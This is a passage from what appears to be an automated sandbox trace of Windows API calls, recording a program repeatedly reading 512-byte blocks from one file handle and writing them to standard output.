[0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] GetFileType (hFile=0x4c) returned 0x1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] GetFileType (hFile=0x4c) returned 0x1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] GetFileType (hFile=0x4c) returned 0x1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] GetFileType (hFile=0x4c) returned 0x1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.110] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.110] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.110] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.110] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, 
lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] GetFileType (hFile=0x4c) returned 0x1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] GetFileType (hFile=0x4c) returned 0x1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] GetFileType (hFile=0x4c) returned 0x1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] GetFileType (hFile=0x4c) returned 0x1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] GetFileType (hFile=0x4c) returned 0x1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] GetFileType (hFile=0x4c) returned 0x1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] GetFileType (hFile=0x4c) returned 0x1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] GetFileType (hFile=0x4c) returned 0x1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.111] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.111] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.111] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.111] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] GetFileType (hFile=0x4c) returned 0x1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] GetFileType (hFile=0x4c) returned 0x1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] GetFileType 
(hFile=0x4c) returned 0x1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] GetFileType (hFile=0x4c) returned 0x1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] GetFileType (hFile=0x4c) returned 0x1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] GetFileType (hFile=0x4c) returned 0x1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] GetFileType (hFile=0x4c) returned 0x1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] GetFileType (hFile=0x4c) returned 0x1 [0174.112] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.112] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.112] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.112] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.112] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] GetFileType (hFile=0x4c) returned 0x1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] GetFileType (hFile=0x4c) returned 0x1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] GetFileType (hFile=0x4c) returned 0x1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] GetFileType (hFile=0x4c) returned 0x1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, 
lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] GetFileType (hFile=0x4c) returned 0x1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] GetFileType (hFile=0x4c) returned 0x1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] GetFileType (hFile=0x4c) returned 0x1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] GetFileType (hFile=0x4c) returned 0x1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.113] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.113] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.113] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.113] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] GetFileType (hFile=0x4c) returned 0x1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] GetFileType (hFile=0x4c) returned 0x1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] GetFileType (hFile=0x4c) returned 0x1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] GetFileType (hFile=0x4c) returned 0x1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] GetFileType (hFile=0x4c) returned 0x1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] GetFileType (hFile=0x4c) returned 0x1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] WriteFile (in: 
hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] GetFileType (hFile=0x4c) returned 0x1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] GetFileType (hFile=0x4c) returned 0x1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.114] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.114] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.114] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.114] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] GetFileType (hFile=0x4c) returned 0x1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] GetFileType (hFile=0x4c) returned 0x1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.115] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0174.115] GetFileType (hFile=0x4c) returned 0x1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] GetFileType (hFile=0x4c) returned 0x1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] GetFileType (hFile=0x4c) returned 0x1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] GetFileType (hFile=0x4c) returned 0x1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] GetFileType (hFile=0x4c) returned 0x1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0174.115] GetFileType (hFile=0x4c) returned 0x1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.115] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.115] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.115] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.115] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] GetFileType (hFile=0x4c) returned 0x1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] GetFileType (hFile=0x4c) returned 0x1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] GetFileType (hFile=0x4c) returned 0x1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] GetFileType (hFile=0x4c) returned 0x1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, 
lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] GetFileType (hFile=0x4c) returned 0x1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] GetFileType (hFile=0x4c) returned 0x1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] GetFileType (hFile=0x4c) returned 0x1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] GetFileType (hFile=0x4c) returned 0x1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.116] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.116] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.116] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.116] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] GetFileType (hFile=0x4c) returned 0x1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] GetFileType (hFile=0x4c) returned 0x1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] GetFileType (hFile=0x4c) returned 0x1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] GetFileType (hFile=0x4c) returned 0x1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] GetFileType (hFile=0x4c) returned 0x1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] GetFileType (hFile=0x4c) returned 0x1 [0174.117] _get_osfhandle (_FileHandle=1) returned 
